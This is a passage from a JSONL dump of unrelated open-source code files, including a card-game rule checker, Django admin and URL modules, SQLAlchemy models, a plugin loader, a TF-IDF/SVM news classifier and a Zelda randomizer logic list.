_check_pair),\n (patterns_pair_straight, _check_pair_straight),\n (patterns_triple, _check_triple),\n (patterns_triple_single, _check_triple_single),\n (patterns_triple_pair, _check_triple_pair),\n (patterns_four_two, _check_four_two),\n (patterns_four_pairs, _check_four_pairs)]\n\n\ndef _get_function_from_pattern(p):\n \"\"\"由pattern得到检查函数\"\"\"\n for one_tuple in _pattern_map_check:\n if p in one_tuple[0]:\n return one_tuple[1]\n\n\n\"\"\"\n生成length到函数的字典\n\"\"\"\n_length_to_pattern_functions = {}\n\n\ndef _add_to_length_functions_dict(length: int, f):\n if length in _length_to_pattern_functions:\n _length_to_pattern_functions[length].append(f)\n else:\n _length_to_pattern_functions[length] = [f]\n\n\n\"\"\"\n引入代码时执行,初始化dict\n\"\"\"\nfor one in _pattern_map_check:\n for pattern_ in one[0]:\n _add_to_length_functions_dict(pattern_ % 100, one[1])\n\n\ndef _check_all_possible(cards) -> CardDescription:\n \"\"\"\n 检查牌型的所有可能\n \"\"\"\n if len(cards) not in _length_to_pattern_functions:\n return None\n functions = _length_to_pattern_functions[len(cards)]\n for f in functions:\n result = f(cards)\n if result:\n return result\n\n\ndef check_all_bomb(cards):\n \"\"\"\n 注意这里长度是没有检查的!\n :param cards:\n :return:\n \"\"\"\n if len(cards) == 2:\n return _check_grand_bomb(cards)\n elif len(cards) % 4 == 0 and 4 <= len(cards) <= 20:\n return _check_bomb(cards)\n\n\ndef check_value_deal(cards, cd=None) -> CardDescription:\n \"\"\"\n :param cards: 牌,必须是min3型 (从小到大排序)\n :param cd: 先前的牌型描述,None表示首次出牌\n :return:\n \"\"\"\n if cd:\n # 优先检查炸弹\n result = check_all_bomb(cards)\n if result:\n return is_cd_bigger(result, cd)\n else:\n if pattern_is_bomb(cd.pattern): # 原来还是炸弹,肯定不行了\n return None\n else:\n # 都不是炸弹,检查常规 长度优先\n if len(cards) == cd.pattern % 100:\n f = _get_function_from_pattern(cd.pattern)\n result = f(cards)\n # 一样的pattern 对比 weight\n if result and result.weight > cd.weight:\n return result\n else:\n result = _check_all_possible(cards)\n return result\n","sub_path":"doudizhu_deprecated/doudizhu.py","file_name":"doudizhu.py","file_ext":"py","file_size_in_byte":9450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"119922997","text":"#!/usr/bin/python3.6\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef give_dir_items(path):\n lista = os.listdir(path)\n result = []\n\n for dat in lista:\n\n datPath = os.path.join(path, dat)\n # print(datPath)\n if os.path.isfile(datPath):\n result.append((dat, \"file\"))\n elif os.path.isdir(datPath):\n result.append((dat, \"directory\"))\n elif not os.path.exists(datPath):\n raise Exception(\"NE POSTOJI {}\".format(str(datPath)))\n else:\n result.append((dat, \"special\"))\n\n return result\n\ndef main():\n path = \".\"\n result = give_dir_items(path)\n print(result)\n\nif __name__ == \"__main__\":\n main()","sub_path":"mrezno/giga_file.py","file_name":"giga_file.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12735096","text":"from django.conf.urls import url\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom main.views import RegistrationView, EmailVerificationView\n\nurlpatterns = [\n url(r'^accounts/registration/$', RegistrationView.as_view(), name='registration'),\n url(r'^accounts/email_verification/?(?P[a-z0-9\\-]+)?/$',\n EmailVerificationView.as_view(), name='email_verification'),\n url(r'^accounts/login/$', LoginView.as_view(), name='login'),\n 
url(r'^accounts/logout/$', LogoutView.as_view(), name='logout'),\n]\n","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"74027879","text":"from os.path import join, dirname, abspath\nfrom os import listdir\nimport importlib.util\n\nimport logging\n\nfrom uuid import uuid4\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass PluginManager(object):\n _plugins = {}\n _instance = None\n\n def __new__(clazz):\n if clazz._instance is None:\n clazz._instance = super(PluginManager, clazz).__new__(clazz)\n return clazz._instance\n\n def get_plugins(self):\n return self._plugins\n\n def get_user_plugins_dir(self):\n script_path = abspath(__file__)\n script_dir = dirname(script_path)\n return join(script_dir, \"user_plugins\")\n\n def load_plugins(self):\n logging.info(f\"Loading plugins...\")\n plugins_dir = self.get_user_plugins_dir()\n for file in listdir(plugins_dir):\n if file == \"__pycache__\":\n continue\n plugin_path = join(plugins_dir, file)\n module_name = f\"{file}\"\n logging.info(f\"\\tloading plugin {module_name} ({plugin_path})...\")\n spec = importlib.util.spec_from_file_location(\n f\"plugin_{module_name}\", plugin_path\n )\n plugin_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(plugin_module)\n plugin_uuid = uuid4()\n self._plugins[plugin_uuid] = plugin_module.Plugin(\n runtime_id=plugin_uuid, name=module_name\n )\n","sub_path":"ingest/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"343837793","text":"import setuptools\n\nwith open(\"../README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name=\"cog\",\n version=\"0.0.1\",\n author_email=\"team@replicate.ai\",\n description=\"Containers for machine learning\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/replicate/cog\",\n license=\"Apache License 2.0\",\n python_requires=\">=3.6.0\",\n install_requires=[\n # intionally loose. 
perhaps these should be vendored to not collide with user code?\n \"flask>=2,<3\",\n \"redis>=3,<4\",\n \"requests>=2,<3\",\n \"PyYAML\",\n ],\n packages=setuptools.find_packages(),\n)\n","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"402386994","text":"def Summ(array):\r\n res = 0\r\n for i in array:\r\n res += i\r\n print(\"Сумма:\", res)\r\n return res\r\n\r\narr = [int(s,2) for s in input(\"Массив: \").split()]\r\n\r\nSumm(arr)\r\nt = arr[0]\r\nfor i in range(len(arr)):\r\n if i != len(arr)-1:\r\n arr[i],arr[i+1] = arr[i+1],arr[i]\r\n else:\r\n t,arr[i] = arr[i],t\r\nSumm(arr)\r\n","sub_path":"Lab 5/5_1_HIgh.py","file_name":"5_1_HIgh.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"550258850","text":"# -*- coding: utf-8 -*-\n\"\"\"\n events.admin\n ~~~~~~~~~~~~\n\n Admin interface for Events.\n\n :copyright: (c) 2015 by Rambler&Co.\n\"\"\"\n\nimport reversion\n\nfrom django import forms\nfrom django.contrib import admin\nfrom django.contrib import messages\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db import transaction\nfrom django.http import Http404\nfrom django.http import HttpResponseRedirect\nfrom django.utils.decorators import method_decorator\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.contrib.admin.utils import unquote\nfrom django.contrib.admin import helpers\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import reverse\nfrom django.forms.formsets import all_valid\nfrom django.utils.encoding import force_text\nfrom django.utils.html import escape\n\nfrom admin_app.core.admin import GalleryInline\nfrom admin_app.core.forms import ContentModelForm\nfrom admin_app.core.utils import tools\nfrom admin_app.core.utils.admin import AddUserMixin\nfrom admin_app.core.utils.admin import ContentAdminMixin\nfrom admin_app.core.utils.admin import EventPlaceMergeAdminMixin\nfrom admin_app.core.utils.admin import ReadonlyInline\nfrom admin_app.core.utils.constants import WEEK_DAYS\nfrom admin_app.core.utils.widgets import AjaxChosenWidget\nfrom admin_app.core.utils.widgets import AutocompleteWidget\nfrom admin_app.content_properties.admin import ContentPropertyInline\nfrom datetimewidget.widgets import DateWidget\nfrom datetimewidget.widgets import TimeWidget\nfrom admin_app.core.utils.options import DEFAULT_FIELDSETS\nfrom admin_app.events.models import Event\nfrom admin_app.events.models import EventPlace\nfrom admin_app.events.models import Session\nfrom admin_app.payments.admin import PaymentInline\nfrom common.seo.admin import SeoInline\nfrom django.contrib.staticfiles.storage import staticfiles_storage\n\n\n# forms\n\nclass SessionForm(forms.ModelForm):\n\n class Meta:\n widgets = {\n 'date_start': DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n 'time_start': TimeWidget(attrs={}, options={'language': 'ru'}),\n 'time_end': TimeWidget(attrs={}, options={'language': 'ru'}),\n }\n\n class Media:\n js = (\n staticfiles_storage.url(\n 'admin/js/admin/sessions.formset.datepicker.js'\n ),\n )\n\n\nclass EventForm(ContentModelForm):\n additional_fieldsets = [\n {\n 'value': (\n 
None,\n {\n 'fields': (\n 'duration',\n 'timetable',\n )\n }\n )\n },\n {\n 'index': 2,\n 'value': DEFAULT_FIELDSETS['dates']\n },\n {\n 'index': -2,\n 'value': DEFAULT_FIELDSETS['prices']\n },\n {\n 'index': -2,\n 'value': DEFAULT_FIELDSETS['contacts']\n },\n {\n 'index': -2,\n 'value': DEFAULT_FIELDSETS['rate']\n },\n ]\n\n def clean(self):\n self.cleaned_data = super(EventForm, self).clean()\n\n date_start = self.cleaned_data.get('date_start')\n date_end = self.cleaned_data.get('date_end')\n if date_start and date_end and date_end < date_start:\n self.cleaned_data.update({\n 'date_start': date_end,\n 'date_end': date_start,\n })\n\n price_from = self.cleaned_data.get('price_from')\n price_till = self.cleaned_data.get('price_till')\n if price_from and price_till and price_from > price_till:\n self.cleaned_data.update({\n 'price_from': price_till,\n 'price_till': price_from,\n })\n\n return self.cleaned_data\n\n class Meta:\n widgets = {\n 'title': AutocompleteWidget(model=Event),\n 'main_image': AjaxChosenWidget(),\n }\n\n\nclass BulkSessionForm(forms.ModelForm):\n date_start = forms.DateField(\n label=u'Начальная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n date_end = forms.DateField(\n label=u'Конечная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n days = forms.MultipleChoiceField(\n choices=WEEK_DAYS,\n label=u'Дни недели',\n required=True,\n widget=forms.CheckboxSelectMultiple,\n )\n\n def clean(self):\n def get_working_days(date_start_obj, date_end_obj, days):\n from dateutil import rrule\n if days:\n weekdays = rrule.rrule(\n rrule.DAILY,\n byweekday=days,\n dtstart=date_start_obj,\n until=date_end_obj\n )\n else:\n weekdays = []\n return list(weekdays)\n\n self.cleaned_data = forms.ModelForm.clean(self)\n\n date_start = self.cleaned_data.get('date_start')\n date_end = self.cleaned_data.get('date_end')\n\n if date_start and date_end and date_end < date_start:\n self.cleaned_data.update({\n 'date_start': date_end,\n 'date_end': date_start,\n })\n\n self.days_list = get_working_days(\n self.cleaned_data.get('date_start'),\n self.cleaned_data.get('date_end'),\n map(int, self.cleaned_data.get('days', []))\n )\n\n if not self.days_list:\n raise ValidationError({\n 'days': u'Пожалуйста выберите дни недели, которые '\n u'попадают между выбранными датами.'\n })\n\n return self.cleaned_data\n\n def save(self, commit=True, formset=None, times_start=None, time_end=None):\n instances = []\n times = filter(\n None, set([i.get('time_start') for i in formset.cleaned_data])\n )\n times = times_start or times\n for day in self.days_list:\n for time_start in times:\n inst, create = Session.objects.get_or_create(\n event_place=self.instance,\n date_start=day,\n time_start=time_start,\n defaults={'time_end': time_end}\n )\n if create:\n instances.append(inst)\n return instances\n\n class Meta:\n exclude = tuple()\n model = EventPlace\n\n def get_fieldsets(self):\n return [(None, {'fields': [i.name for i in self.visible_fields()]})]\n\n class Media:\n js = (\n staticfiles_storage.url(\n 'admin/js/admin/sessions.formset.datepicker.js'\n ),\n )\n\n\n# inlines\n\nclass EventInline(ReadonlyInline):\n model = Event\n fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n readonly_fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n\n\nclass 
SessionInline(admin.TabularInline):\n form = SessionForm\n model = Session\n extra = 1\n exclude = ('id', )\n\n\nclass StartTimeSessionInline(SessionInline):\n exclude = ('id', 'date_start')\n extra = 1\n\n\nclass EventPlaceInline(admin.TabularInline):\n model = EventPlace\n extra = 1\n fields = ('place', 'schedule_btn')\n readonly_fields = ('schedule_btn', )\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget}\n }\n\n\n# admins\n\nclass EventPlaceAdmin(reversion.VersionAdmin):\n inlines = (SessionInline, )\n list_display = (\n 'modified',\n 'event_title',\n 'place_title',\n )\n search_fields = ('event__title', 'place__title')\n readonly_fields = ('event', 'place')\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget},\n }\n\n def change_view(self, request, object_id, form_url='', extra_context=None):\n extra_context = {\n 'has_bulk_session_view': hasattr(self, 'bulk_session_view'),\n }\n return super(EventPlaceAdmin, self).change_view(\n request, object_id, form_url='', extra_context=extra_context\n )\n\n def has_add_permission(self, request):\n return False\n\n @method_decorator(csrf_protect)\n @transaction.atomic\n def bulk_session_view(self, request, object_id, extra_context=None):\n model = self.model\n opts = model._meta\n bulk_session_inlines = [StartTimeSessionInline]\n\n obj = self.get_object(request, unquote(object_id))\n if not self.has_change_permission(request, obj):\n raise PermissionDenied\n if obj is None:\n raise Http404(\n _('{name} object with primary key {key} does not exist.')\n .format(\n name=force_text(opts.verbose_name),\n key=escape(object_id),\n )\n )\n\n ModelForm = BulkSessionForm\n if request.method == 'POST':\n data = request.POST\n data['place'] = obj.place.pk\n data['event'] = obj.event.pk\n form = ModelForm(data, request.FILES, instance=obj)\n form_validated = True if form.is_valid() else False\n new_object = form.instance\n\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, new_object, change=True\n )\n if all_valid(formsets) and form_validated:\n new_objects = form.save(formset=formsets[0])\n redirect_url = reverse('admin:{0}_{1}_change'.format(\n opts.app_label, opts.model_name),\n current_app=self.admin_site.name,\n args=[new_object.pk])\n return self.response_bulk_session(\n request, redirect_url, new_objects\n )\n else:\n form = ModelForm(instance=obj)\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, None, change=False\n )\n\n adminForm = helpers.AdminForm(\n form,\n list(form.get_fieldsets()),\n self.get_prepopulated_fields(request, obj),\n self.get_readonly_fields(request, obj),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_formsets = self.get_inline_formsets(\n request, formsets, inline_instances, obj\n )\n\n for inline_formset in inline_formsets:\n media = media + inline_formset.media\n\n context = dict(\n site_title=self.admin_site.site_title,\n site_header=self.admin_site.site_header,\n title=_(u'Добавить несколько сеансов'),\n adminform=adminForm,\n object_id=object_id,\n original=obj,\n media=media,\n inline_admin_formsets=inline_formsets,\n errors=helpers.AdminErrorList(form, formsets),\n preserved_filters=self.get_preserved_filters(request),\n )\n\n context.update(extra_context or {})\n\n form_url = ''\n new_template = 'admin/{0}/{1}/bulk_session.html'.format(\n opts.app_label, opts.model_name)\n with 
tools.replace_obj_var(self, 'change_form_template', new_template):\n result = self.render_change_form(\n request, context,\n add=False,\n change=True,\n obj=obj,\n form_url=form_url\n )\n return result\n\n def response_bulk_session(self, request, redirect_url, instances):\n if instances:\n sessions_msg = u'
    {0}
'.format(u''.join(\n [u'
  • Дата: {0} Время начала: {1}
  • '\n .format(i.date_start.date(), i.time_start)\n for i in instances]))\n msg = u'Успешно добавленные сеансы ({0}):
    {1}'\\\n .format(len(instances), sessions_msg)\n else:\n msg = _(u'Сеансы не были добавлены.')\n self.message_user(request, mark_safe(msg), messages.SUCCESS)\n return HttpResponseRedirect(redirect_url)\n\n def get_urls(self):\n from django.conf.urls import url\n urlpatterns = list(super(EventPlaceAdmin, self).get_urls())\n urlpatterns.insert(-1, url(r'^(.+)/bulk_session/$',\n self.bulk_session_view,\n name='admin_bulk_session'))\n return urlpatterns\n\n def event_title(self, obj):\n return obj.event.title\n event_title.allow_tags = True\n event_title.admin_order_field = 'event__title'\n event_title.short_description = _(u'Событие')\n\n def place_title(self, obj):\n return obj.place.title\n place_title.allow_tags = True\n place_title.admin_order_field = 'place__title'\n place_title.short_description = _(u'Место')\n\n\nclass EventAdmin(\n EventPlaceMergeAdminMixin,\n ContentAdminMixin,\n AddUserMixin,\n reversion.VersionAdmin\n):\n form = EventForm\n fieldsets = EventForm.get_fieldsets()\n list_display = (\n 'title',\n 'date_start',\n 'date_end',\n 'main_tag',\n 'tags_display',\n 'source_info_display',\n 'created',\n 'modified',\n 'pub_date',\n 'status',\n 'content_actions',\n )\n inlines = (\n GalleryInline,\n SeoInline,\n PaymentInline,\n EventPlaceInline,\n ContentPropertyInline,\n )\n\n\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventPlace, EventPlaceAdmin)\n","sub_path":"src/admin_app/events/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"382821044","text":"# snake parameters\r\nfrom pygame import K_p\r\n\r\nSNAKE_COLOR = (255,0,0)\r\nSNAKE_POS0 = (10,10)\r\n\r\nSNACK_COLOR = (0,255,0)\r\nSNAKETAIL_COLOR = (0,0,255)\r\n# to change the snake speed\r\nSNAKE_DT = 0.15# sleep in seconds\r\n# snake eyes color\r\nEYE_COLOR = (0,0,0)\r\n\r\n# grid numbers\r\nNROWS = 20\r\nNCOLS = 20\r\n# grid size\r\nGRID_DX = 25\r\nGRID_DY = 25\r\n# grid color\r\nGRID_COLOR = (255,255,255)\r\n\r\n# display\r\nDISPLAY_WIDTH = GRID_DX*NROWS\r\nDISPLAY_HEIGHT = GRID_DY*NCOLS\r\n# display background\r\nBACKGROUND_COLOR = (0,0,0)\r\n\r\n\r\n# pause key\r\nPAUSE_KEY = K_p","sub_path":"snake_pygame/CONFIGS.py","file_name":"CONFIGS.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"514537298","text":"#!/usr/bin/env python3\n\nfrom sqlalchemy.orm import validates\nfrom sqlalchemy import Column, Integer, String\nfrom database import Base\n\n\nclass Property(Base):\n __tablename__ = \"properties\"\n id = Column(Integer, primary_key=True)\n x = Column(Integer)\n y = Column(Integer)\n beds = Column(Integer)\n baths = Column(Integer)\n squareMeters = Column(Integer)\n\n def __init__(self, x=None, y=None, beds=None, baths=None, squareMeters=None):\n self.x = x\n self.y = y\n self.beds = beds\n self.baths = baths\n self.squareMeters = squareMeters\n\n def __repr__(self):\n return \"\" % (self.id)\n\n @validates(\"x\")\n def validate_x(self, key, value):\n if 0 <= int(value) and int(value) <= 1400:\n return value\n\n raise ValueError()\n\n @validates(\"y\")\n def validate_y(self, key, value):\n if 0 <= int(value) and int(value) <= 1000:\n return value\n\n raise ValueError()\n\n @validates(\"beds\")\n def validate_beds(self, key, value):\n if 1 <= int(value) and int(value) <= 5:\n return value\n\n raise ValueError()\n\n @validates(\"baths\")\n def validate_baths(self, key, 
value):\n if 1 <= int(value) and int(value) <= 4:\n return value\n\n raise ValueError()\n\n @validates(\"squareMeters\")\n def validate_square_meters(self, key, value):\n if 20 <= int(value) and int(value) <= 240:\n return value\n\n raise ValueError()\n\n\nclass Province(Base):\n __tablename__ = \"provinces\"\n id = Column(Integer, primary_key=True)\n name = Column(String(30))\n ax = Column(Integer)\n ay = Column(Integer)\n bx = Column(Integer)\n by = Column(Integer)\n\n def __init__(self, name=None, ax=None, ay=None, bx=None, by=None):\n self.name = name\n self.ax = ax\n self.ay = ay\n self.bx = bx\n self.by = by\n\n def __repr__(self):\n return \"\" % (self.id, self.name)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"409076802","text":"import pickle\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import punkt\nfrom nltk.corpus.reader import wordnet\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\n\npath_models = \"./04. Model Training/Models/\"\n\n# SVM\npath_svm = path_models + 'best_svc.pickle'\nwith open(path_svm, 'rb') as data:\n svc_model = pickle.load(data)\n\npath_tfidf = \"./03. Feature Engineering/Pickles/tfidf.pickle\"\n\nwith open(path_tfidf, 'rb') as data:\n tfidf = pickle.load(data)\n\ncategory_codes = {\n 'business': 0,\n 'entertainment': 1,\n 'politics': 2,\n 'sport': 3,\n 'tech': 4,\n 'other':5\n}\n\npunctuation_signs = list(\"?:!.,;\")\nstop_words = list(stopwords.words('english'))\n\ndef create_features_from_df(df):\n \n df['Content_Parsed_1'] = df['Content'].str.replace(\"\\r\", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\"\\n\", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\" \", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace('\"', '')\n \n df['Content_Parsed_2'] = df['Content_Parsed_1'].str.lower()\n \n df['Content_Parsed_3'] = df['Content_Parsed_2']\n for punct_sign in punctuation_signs:\n df['Content_Parsed_3'] = df['Content_Parsed_3'].str.replace(punct_sign, '')\n \n df['Content_Parsed_4'] = df['Content_Parsed_3'].str.replace(\"'s\", \"\")\n \n wordnet_lemmatizer = WordNetLemmatizer()\n nrows = len(df)\n lemmatized_text_list = []\n for row in range(0, nrows):\n\n # Create an empty list containing lemmatized words\n lemmatized_list = []\n # Save the text and its words into an object\n text = df.loc[row]['Content_Parsed_4']\n text_words = text.split(\" \")\n # Iterate through every word to lemmatize\n for word in text_words:\n lemmatized_list.append(wordnet_lemmatizer.lemmatize(word, pos=\"v\"))\n # Join the list\n lemmatized_text = \" \".join(lemmatized_list)\n # Append to the list containing the texts\n lemmatized_text_list.append(lemmatized_text)\n \n df['Content_Parsed_5'] = lemmatized_text_list\n \n df['Content_Parsed_6'] = df['Content_Parsed_5']\n for stop_word in stop_words:\n regex_stopword = r\"\\b\" + stop_word + r\"\\b\"\n df['Content_Parsed_6'] = df['Content_Parsed_6'].str.replace(regex_stopword, '')\n \n # TF-IDF\n features = tfidf.transform(df['Content_Parsed_6']).toarray()\n \n return 
features\n\n\ndef get_category_name(category_id):\n for category, id_ in category_codes.items(): \n if id_ == category_id:\n return category\n\ndef predict_from_features(features):\n \n # Obtain the highest probability of the predictions for each article\n predictions_proba = svc_model.predict_proba(features).max(axis=1) \n \n # Predict using the input model\n predictions_pre = svc_model.predict(features)\n\n # Replace prediction with 6 if associated cond. probability less than threshold\n predictions = []\n\n for prob, cat in zip(predictions_proba, predictions_pre):\n if prob > .65:\n predictions.append(cat)\n else:\n predictions.append(5)\n\n # Return result\n categories = [get_category_name(x) for x in predictions]\n \n return categories\n\ndef complete_df(df, categories):\n try:\n df['Prediction'] = categories\n except Exception as ex:\n print(\"Exception\", ex, len(df), len(categories))\n finally:\n df['Prediction'] = \"other\"\n\n return df","sub_path":"06. App Creation/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"544226936","text":"\"\"\"\nHelper functions to deliver entrance/exit/region sets to OWG rules.\n\"\"\"\n\n\n# TODO: reevaluate these points:\n# why is this its own module?\n# why are these functions?\n# why is it named sets, when it was originally functions that return lists and had nothing to do with sets?\n\ndef get_immediately_accessible_entrances():\n \"\"\"\n Entrances that are available with no items at all.\n\n At this point, these are fake flipper spots.\n \"\"\"\n yield 'Hobo Bridge'\n yield 'Zoras River'\n yield 'Lake Hylia Central Island Pier'\n\n\ndef get_sword_required_superbunny_mirror_regions():\n \"\"\"\n Cave regions that superbunny can get through - but only with a sword.\n \"\"\"\n yield 'Mini Moldorm Cave'\n yield 'Spiral Cave (Top)'\n\n\ndef get_invalid_mirror_bunny_entrances_dw():\n \"\"\"\n Dark World entrances that can't be superbunny-mirrored into.\n \"\"\"\n\n yield 'Skull Woods Final Section (Entrance)'\n yield 'Hype Cave'\n yield 'Bonk Fairy (Dark)'\n yield 'Thieves Town'\n yield 'Dark World Hammer Peg Cave'\n yield 'Brewery'\n yield 'Hookshot Cave'\n yield 'Hookshot Cave Exit (South)'\n yield 'Dark Lake Hylia Ledge Fairy'\n yield 'Dark Lake Hylia Ledge Spike Cave'\n\n\ndef get_invalid_mirror_bunny_entrances_lw():\n \"\"\"\n Light World entrances that can't be superbunny-mirrored into.\n\n A couple of these, like Blind's Hideout, are odd cases where the pixel\n leading into the entrance prevents mirror superbunnying - generally due to\n there being stairs there. 
\n \"\"\"\n\n yield 'Bonk Rock Cave'\n yield 'Bonk Fairy (Light)'\n yield 'Blinds Hideout'\n yield '50 Rupee Cave'\n yield '20 Rupee Cave'\n yield 'Checkerboard Cave'\n yield 'Light Hype Fairy'\n yield 'Waterfall of Wishing'\n yield 'Light World Bomb Hut'\n yield 'Mini Moldorm Cave'\n yield 'Ice Rod Cave'\n yield 'Hyrule Castle Secret Entrance Stairs'\n yield 'Sanctuary Grave'\n yield 'Kings Grave'\n yield 'Tower of Hera'\n\n\ndef get_superbunny_accessible_locations():\n \"\"\"\n Interior locations that can be accessed with superbunny state.\n \"\"\"\n\n yield 'Waterfall of Wishing - Left'\n yield 'Waterfall of Wishing - Right'\n yield 'King\\'s Tomb', 'Floodgate'\n yield 'Floodgate Chest'\n yield 'Cave 45'\n yield 'Bonk Rock Cave'\n yield 'Brewery'\n yield 'C-Shaped House'\n yield 'Chest Game'\n yield 'Mire Shed - Left'\n yield 'Mire Shed - Right'\n yield 'Secret Passage'\n yield 'Ice Rod Cave'\n yield 'Pyramid Fairy - Left'\n yield 'Pyramid Fairy - Right'\n yield 'Superbunny Cave - Top'\n yield 'Superbunny Cave - Bottom'\n\n\ndef get_boots_clip_exits_lw(inverted = False):\n \"\"\"\n Special Light World region exits that require boots clips.\n \"\"\"\n\n yield 'Bat Cave River Clip Spot'\n yield 'Light World DMA Clip Spot'\n yield 'Hera Ascent'\n yield 'Death Mountain Return Ledge Clip Spot'\n yield 'Death Mountain Glitched Bridge'\n yield 'Zora Descent Clip Spot'\n yield 'Desert Northern Cliffs'\n yield 'Lake Hylia Island Clip Spot'\n yield 'Death Mountain Descent'\n yield 'Graveyard Ledge Clip Spot'\n # Also requires a waterwalk setup, but the point still remains.\n yield 'Waterfall of Wishing'\n\n if not inverted:\n yield 'Spectacle Rock Clip Spot'\n yield 'Bombos Tablet Clip Spot'\n yield 'Floating Island Clip Spot'\n yield 'Cave 45 Clip Spot'\n\n\ndef get_boots_clip_exits_dw(inverted = False):\n \"\"\"\n Special Dark World region exits that require boots clips.\n \"\"\"\n\n yield 'Dark World DMA Clip Spot'\n yield 'Bumper Cave Ledge Clip Spot'\n yield 'Catfish Descent'\n yield 'Hammer Pegs River Clip Spot'\n yield 'Dark Lake Hylia Ledge Clip Spot'\n yield 'Dark Desert Cliffs Clip Spot'\n yield 'Dark Death Mountain Descent'\n\n if not inverted:\n yield 'Ganons Tower Ascent'\n yield 'Dark Death Mountain Glitched Bridge'\n yield 'Turtle Rock (Top) Clip Spot'\n\n\ndef get_glitched_speed_drops_dw():\n \"\"\"\n Dark World drop-down ledges that require glitched speed.\n \"\"\"\n yield 'Dark Death Mountain Ledge Clip Spot'\n\n\ndef get_mirror_clip_spots_dw():\n \"\"\"\n Mirror shenanigans that are in logic even if the player is a bunny.\n \"\"\"\n yield 'Dark Death Mountain Offset Mirror'\n yield 'Dark Death Mountain Bunny Descent Mirror Spot'\n\n\ndef get_mirror_clip_spots_lw():\n \"\"\"\n Inverted mirror shenanigans in logic even if the player is a bunny.\n \"\"\"\n yield 'Death Mountain Bunny Descent Mirror Spot'\n yield 'Death Mountain Offset Mirror'\n\n\ndef get_invalid_bunny_revival_dungeons():\n \"\"\"\n Dungeon regions that can't be bunny revived from.\n \"\"\"\n\n yield 'Tower of Hera (Bottom)'\n yield 'Swamp Palace (Entrance)'\n yield 'Turtle Rock (Entrance)'\n","sub_path":"OWGSets.py","file_name":"OWGSets.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"205781738","text":"\"\"\"full datetime\n\nRevision ID: 144649a54955\nRevises: 305ace38cf61\nCreate Date: 2015-10-15 15:03:12.623726\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '144649a54955'\ndown_revision = 
